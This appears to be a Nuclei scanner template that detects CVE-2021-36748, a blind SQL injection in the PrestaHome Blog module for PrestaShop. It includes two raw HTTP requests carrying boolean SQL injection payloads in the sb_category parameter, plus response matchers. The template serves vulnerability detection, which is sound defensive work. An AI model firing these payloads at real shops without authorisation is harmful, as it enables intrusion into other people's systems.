id: CVE-2021-36748 info: name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection author: whoever severity: high description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter. remediation: | Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability. reference: - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/ - https://alysum5.promokit.eu/promokit/documentation/blog/ - https://blog.sorcery.ie - https://nvd.nist.gov/vuln/detail/CVE-2021-36748 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-36748 cwe-id: CWE-89 epss-score: 0.0061 epss-percentile: 0.76237 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 vendor: prestahome product: blog framework: prestashop tags: cve,cve2021,prestashop,prestahome,sqli,cms http: - raw: - | GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1 Host: {{Hostname}} - | GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 404" - 'contains(body_1, "prestashop")' - "contains(tolower(header_2), 'index.php?controller=404')" - "len(body_2) == 0" condition: and # digest: 4b0a00483046022100d8378dfb2eaf54f6f56b8b33656b2a87fdcd2d48732dd451228c8278185f623b02210090ce8d7cb0376afdbf564c8fd1b049c9b085b4c657618c1ea16f7705e9dd43f3:922c64590222798bb761d5b6d8e72950